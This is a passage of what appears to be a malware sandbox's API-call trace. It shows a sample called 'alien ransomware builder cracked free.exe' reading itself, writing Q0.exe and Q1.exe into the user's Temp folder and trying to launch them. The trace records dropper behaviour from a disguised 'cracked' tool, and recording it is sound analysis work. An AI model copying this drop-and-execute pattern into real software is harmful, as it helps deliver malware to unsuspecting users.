(hMenu=0x0, uIDEnableItem=0xf120, uEnable=0x1) returned 1 [0049.143] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf000, uEnable=0x1) returned 1 [0049.143] ShowWindow (hWnd=0x60150, nCmdShow=5) returned 0 [0049.147] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x60150, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0049.151] GetWindowTextLengthW (hWnd=0x60150) returned 5 [0049.151] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x60150, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x5 [0049.151] GetSystemMetrics (nIndex=42) returned 0 [0049.152] CoTaskMemAlloc (cb=0x10) returned 0x1079440 [0049.152] GetWindowTextW (in: hWnd=0x60150, lpString=0x1079440, nMaxCount=6 | out: lpString="Form1") returned 5 [0049.152] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x60150, Msg=0xd, wParam=0x6, lParam=0x1079440) returned 0x5 [0049.152] CoTaskMemFree (pv=0x1079440) [0049.357] CoTaskMemAlloc (cb=0x20c) returned 0x10671d0 [0049.357] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x10671d0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0049.357] CoTaskMemFree (pv=0x10671d0) [0049.357] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", nBufferLength=0x105, lpBuffer=0xefd910, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x23 [0049.369] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\alien ransomware builder cracked free.exe", nBufferLength=0x105, lpBuffer=0xefd690, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\alien ransomware builder cracked free.exe", lpFilePart=0x0) returned 0x41 [0049.385] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\alien ransomware builder cracked free.config", nBufferLength=0x105, lpBuffer=0xefd680, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\alien ransomware builder cracked free.config", lpFilePart=0x0) returned 0x44 [0049.385] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\alien ransomware builder cracked free.config", nBufferLength=0x105, lpBuffer=0xefd580, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\alien ransomware builder cracked free.config", lpFilePart=0x0) returned 0x44 [0049.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0xefd580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", lpFilePart=0x0) returned 0x30 [0049.760] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0xefd540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45 [0049.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0xefd3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45 [0049.765] SetErrorMode (uMode=0x1) returned 0x0 [0049.766] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2f4 [0049.767] GetFileType (hFile=0x2f4) returned 0x1 [0049.768] SetErrorMode (uMode=0x0) returned 0x1 [0049.768] GetFileType (hFile=0x2f4) returned 0x1 [0049.787] GetFileSize (in: hFile=0x2f4, lpFileSizeHigh=0xefd848 | out: lpFileSizeHigh=0xefd848*=0x0) returned 0x65b3 [0049.790] ReadFile (in: hFile=0x2f4, lpBuffer=0x2ecbf58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xefd768, lpOverlapped=0x0 | out: lpBuffer=0x2ecbf58*, lpNumberOfBytesRead=0xefd768*=0x1000, lpOverlapped=0x0) returned 1 [0049.829] ReadFile (in: hFile=0x2f4, lpBuffer=0x2ecbf58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xefd6a8, lpOverlapped=0x0 | out: lpBuffer=0x2ecbf58*, lpNumberOfBytesRead=0xefd6a8*=0x1000, lpOverlapped=0x0) returned 1 [0049.829] ReadFile (in: hFile=0x2f4, lpBuffer=0x2ecbf58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xefd6a8, lpOverlapped=0x0 | out: lpBuffer=0x2ecbf58*, lpNumberOfBytesRead=0xefd6a8*=0x1000, lpOverlapped=0x0) returned 1 [0049.829] ReadFile (in: hFile=0x2f4, lpBuffer=0x2ecbf58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xefd6a8, lpOverlapped=0x0 | out: lpBuffer=0x2ecbf58*, lpNumberOfBytesRead=0xefd6a8*=0x1000, lpOverlapped=0x0) returned 1 [0049.829] ReadFile (in: hFile=0x2f4, lpBuffer=0x2ecbf58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xefd6a8, lpOverlapped=0x0 | out: lpBuffer=0x2ecbf58*, lpNumberOfBytesRead=0xefd6a8*=0x1000, lpOverlapped=0x0) returned 1 [0049.830] ReadFile (in: hFile=0x2f4, lpBuffer=0x2ecbf58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xefd6a8, lpOverlapped=0x0 | out: lpBuffer=0x2ecbf58*, lpNumberOfBytesRead=0xefd6a8*=0x1000, lpOverlapped=0x0) returned 1 [0049.830] ReadFile (in: hFile=0x2f4, lpBuffer=0x2ecbf58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xefd6a8, lpOverlapped=0x0 | out: lpBuffer=0x2ecbf58*, lpNumberOfBytesRead=0xefd6a8*=0x5b3, lpOverlapped=0x0) returned 1 [0049.830] ReadFile (in: hFile=0x2f4, lpBuffer=0x2ecbf58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xefd818, lpOverlapped=0x0 | out: lpBuffer=0x2ecbf58*, lpNumberOfBytesRead=0xefd818*=0x0, lpOverlapped=0x0) returned 1 [0049.831] CloseHandle (hObject=0x2f4) returned 1 [0049.832] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\alien ransomware builder cracked free.config", nBufferLength=0x105, lpBuffer=0xefd540, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\alien ransomware builder cracked free.config", lpFilePart=0x0) returned 0x44 [0049.833] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\alien ransomware builder cracked free.config", nBufferLength=0x105, lpBuffer=0xefd3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\alien ransomware builder cracked free.config", lpFilePart=0x0) returned 0x44 [0049.833] SetErrorMode (uMode=0x1) returned 0x0 [0049.833] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\alien ransomware builder cracked free.config" (normalized: "c:\\users\\fd1hvy\\desktop\\alien ransomware builder cracked free.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffffffffffff [0049.967] SetErrorMode (uMode=0x0) returned 0x1 [0049.971] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\alien ransomware builder cracked free.exe", nBufferLength=0x105, lpBuffer=0xefd760, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\alien ransomware builder cracked free.exe", lpFilePart=0x0) returned 0x41 [0049.984] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\alien ransomware builder cracked free.exe", nBufferLength=0x105, lpBuffer=0xefd7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\alien ransomware builder cracked free.exe", lpFilePart=0x0) returned 0x41 [0049.984] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\alien ransomware builder cracked free.exe", nBufferLength=0x105, lpBuffer=0xefd6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\alien ransomware builder cracked free.exe", lpFilePart=0x0) returned 0x41 [0049.984] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\alien ransomware builder cracked free.exe", nBufferLength=0x105, lpBuffer=0xefd770, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\alien ransomware builder cracked free.exe", lpFilePart=0x0) returned 0x41 [0049.984] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\alien ransomware builder cracked free.exe", nBufferLength=0x105, lpBuffer=0xefd620, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\alien ransomware builder cracked free.exe", lpFilePart=0x0) returned 0x41 [0049.984] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\alien ransomware builder cracked free.exe", nBufferLength=0x105, lpBuffer=0xefd740, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\alien ransomware builder cracked free.exe", lpFilePart=0x0) returned 0x41 [0049.985] SetErrorMode (uMode=0x1) returned 0x0 [0049.985] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\alien ransomware builder cracked free.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\alien ransomware builder cracked free.exe"), fInfoLevelId=0x0, lpFileInformation=0xefd950 | out: lpFileInformation=0xefd950*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf99d0b80, ftCreationTime.dwHighDateTime=0x1d5dff8, ftLastAccessTime.dwLowDateTime=0xf99d0b80, ftLastAccessTime.dwHighDateTime=0x1d5dff8, ftLastWriteTime.dwLowDateTime=0xf7d34800, ftLastWriteTime.dwHighDateTime=0x1d5dff8, nFileSizeHigh=0x0, nFileSizeLow=0xf0b23)) returned 1 [0049.986] SetErrorMode (uMode=0x0) returned 0x1 [0049.986] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\alien ransomware builder cracked free.exe", nBufferLength=0x105, lpBuffer=0xefd320, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\alien ransomware builder cracked free.exe", lpFilePart=0x0) returned 0x41 [0049.986] SetErrorMode (uMode=0x1) returned 0x0 [0049.986] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\alien ransomware builder cracked free.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\alien ransomware builder cracked free.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2f4 [0049.986] GetFileType (hFile=0x2f4) returned 0x1 [0049.986] SetErrorMode (uMode=0x0) returned 0x1 [0049.987] GetFileType (hFile=0x2f4) returned 0x1 [0049.994] GetFileSize (in: hFile=0x2f4, lpFileSizeHigh=0xefdcb8 | out: lpFileSizeHigh=0xefdcb8*=0x0) returned 0xf0b23 [0050.051] ReadFile (in: hFile=0x2f4, lpBuffer=0x130a1e00, nNumberOfBytesToRead=0xf0b23, lpNumberOfBytesRead=0xefda88, lpOverlapped=0x0 | out: lpBuffer=0x130a1e00*, lpNumberOfBytesRead=0xefda88*=0xf0b23, lpOverlapped=0x0) returned 1 [0050.107] CloseHandle (hObject=0x2f4) returned 1 [0050.308] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q0.exe", nBufferLength=0x105, lpBuffer=0xefd7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q0.exe", lpFilePart=0x0) returned 0x29 [0050.309] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q0.exe", nBufferLength=0x105, lpBuffer=0xefd6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q0.exe", lpFilePart=0x0) returned 0x29 [0050.309] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q0.exe", nBufferLength=0x105, lpBuffer=0xefd770, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q0.exe", lpFilePart=0x0) returned 0x29 [0050.310] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q0.exe", nBufferLength=0x105, lpBuffer=0xefd620, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q0.exe", lpFilePart=0x0) returned 0x29 [0050.310] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q0.exe", nBufferLength=0x105, lpBuffer=0xefd740, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q0.exe", lpFilePart=0x0) returned 0x29 [0050.310] SetErrorMode (uMode=0x1) returned 0x0 [0050.310] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q0.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\q0.exe"), fInfoLevelId=0x0, lpFileInformation=0xefd950 | out: lpFileInformation=0xefd950*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0050.310] SetErrorMode (uMode=0x0) returned 0x1 [0050.311] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q0.exe", nBufferLength=0x105, lpBuffer=0xefd320, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q0.exe", lpFilePart=0x0) returned 0x29 [0050.311] SetErrorMode (uMode=0x1) returned 0x0 [0050.311] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q0.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\q0.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2f4 [0050.312] GetFileType (hFile=0x2f4) returned 0x1 [0050.312] SetErrorMode (uMode=0x0) returned 0x1 [0050.312] GetFileType (hFile=0x2f4) returned 0x1 [0050.330] WriteFile (in: hFile=0x2f4, lpBuffer=0x2f14658*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f14658*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0050.331] WriteFile (in: hFile=0x2f4, lpBuffer=0x2f14658*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f14658*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0050.331] WriteFile (in: hFile=0x2f4, lpBuffer=0x2f14658*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f14658*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0050.332] WriteFile (in: hFile=0x2f4, lpBuffer=0x2f14658*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefdac8, lpOverlapped=0x0 | out: lpBuffer=0x2f14658*, lpNumberOfBytesWritten=0xefdac8*=0x1000, lpOverlapped=0x0) returned 1 [0050.332] WriteFile (in: hFile=0x2f4, lpBuffer=0x2f14658*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0xefdaf8, lpOverlapped=0x0 | out: lpBuffer=0x2f14658*, lpNumberOfBytesWritten=0xefdaf8*=0x200, lpOverlapped=0x0) returned 1 [0050.335] CloseHandle (hObject=0x2f4) returned 1 [0050.337] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q0.exe", nBufferLength=0x105, lpBuffer=0xefd8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q0.exe", lpFilePart=0x0) returned 0x29 [0050.337] SetErrorMode (uMode=0x1) returned 0x0 [0050.337] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q0.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\q0.exe"), fInfoLevelId=0x0, lpFileInformation=0xefdaf0 | out: lpFileInformation=0xefdaf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b92d5fc, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x1b92d5fc, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x1b979b6f, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x4200)) returned 1 [0050.337] SetErrorMode (uMode=0x0) returned 0x1 [0050.338] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp", nBufferLength=0x105, lpBuffer=0xefd820, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp", lpFilePart=0x0) returned 0x22 [0050.339] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp", nBufferLength=0x105, lpBuffer=0xefd620, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp", lpFilePart=0x0) returned 0x22 [0050.340] SetErrorMode (uMode=0x1) returned 0x0 [0050.370] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q0.exe", lpFindFileData=0xefd7c0 | out: lpFindFileData=0xefd7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b92d5fc, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x1b92d5fc, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x1b979b6f, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Q0.exe", cAlternateFileName="")) returned 0x1068d70 [0050.371] FindNextFileW (in: hFindFile=0x1068d70, lpFindFileData=0xefd7d0 | out: lpFindFileData=0xefd7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b92d5fc, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x1b92d5fc, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x1b979b6f, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Q0.exe", cAlternateFileName="")) returned 0 [0050.371] FindClose (in: hFindFile=0x1068d70 | out: hFindFile=0x1068d70) returned 1 [0050.371] SetErrorMode (uMode=0x0) returned 0x1 [0050.380] SetErrorMode (uMode=0x1) returned 0x0 [0050.380] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q0.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\q0.exe"), fInfoLevelId=0x0, lpFileInformation=0xefdaa0 | out: lpFileInformation=0xefdaa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b92d5fc, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x1b92d5fc, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x1b979b6f, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x4200)) returned 1 [0050.380] SetErrorMode (uMode=0x0) returned 0x1 [0050.380] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q0.exe", nBufferLength=0x105, lpBuffer=0xefd6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q0.exe", lpFilePart=0x0) returned 0x29 [0050.381] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q0.exe", nBufferLength=0x105, lpBuffer=0xefd7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q0.exe", lpFilePart=0x0) returned 0x29 [0050.382] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q0.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\q0.exe")) returned 1 [0050.447] LocalAlloc (uFlags=0x0, uBytes=0x56) returned 0x10687d0 [0050.453] RtlMoveMemory (in: Destination=0x10687d0, Source=0x2f17200, Length=0x56 | out: Destination=0x10687d0) [0050.463] ShellExecuteExW (in: pExecInfo=0x2f17438*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\\\Q0.exe", lpParameters=0x0, lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x2f17438*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\\\Q0.exe", lpParameters=0x0, lpDirectory=0x0, nShow=1, hInstApp=0x2, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 0 [0052.089] CoTaskMemAlloc (cb=0x204) returned 0x1092550 [0052.089] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x1092550, nSize=0x101, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0052.089] CoTaskMemFree (pv=0x1092550) [0052.111] LocalFree (hMem=0x10687d0) returned 0x0 [0052.113] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q1.exe", nBufferLength=0x105, lpBuffer=0xefd7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q1.exe", lpFilePart=0x0) returned 0x29 [0052.113] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q1.exe", nBufferLength=0x105, lpBuffer=0xefd6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q1.exe", lpFilePart=0x0) returned 0x29 [0052.113] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q1.exe", nBufferLength=0x105, lpBuffer=0xefd770, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q1.exe", lpFilePart=0x0) returned 0x29 [0052.113] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q1.exe", nBufferLength=0x105, lpBuffer=0xefd620, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q1.exe", lpFilePart=0x0) returned 0x29 [0052.113] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q1.exe", nBufferLength=0x105, lpBuffer=0xefd740, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q1.exe", lpFilePart=0x0) returned 0x29 [0052.113] SetErrorMode (uMode=0x1) returned 0x0 [0052.113] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q1.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\q1.exe"), fInfoLevelId=0x0, lpFileInformation=0xefd950 | out: lpFileInformation=0xefd950*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0052.113] SetErrorMode (uMode=0x0) returned 0x1 [0052.114] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q1.exe", nBufferLength=0x105, lpBuffer=0xefd320, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q1.exe", lpFilePart=0x0) returned 0x29 [0052.114] SetErrorMode (uMode=0x1) returned 0x0 [0052.114] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q1.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\q1.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3f8 [0052.114] GetFileType (hFile=0x3f8) returned 0x1 [0052.114] SetErrorMode (uMode=0x0) returned 0x1 [0052.114] GetFileType (hFile=0x3f8) returned 0x1 [0052.119] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.120] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.120] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.120] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.121] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.121] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.121] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.121] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.121] WriteFile (in: hFile=0x3f8, lpBuffer=0x2f19bd0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xefda68, lpOverlapped=0x0 | out: lpBuffer=0x2f19bd0*, lpNumberOfBytesWritten=0xefda68*=0x1000, lpOverlapped=0x0) returned 1 [0052.122] WriteFile (in: hFile=0x3f8, 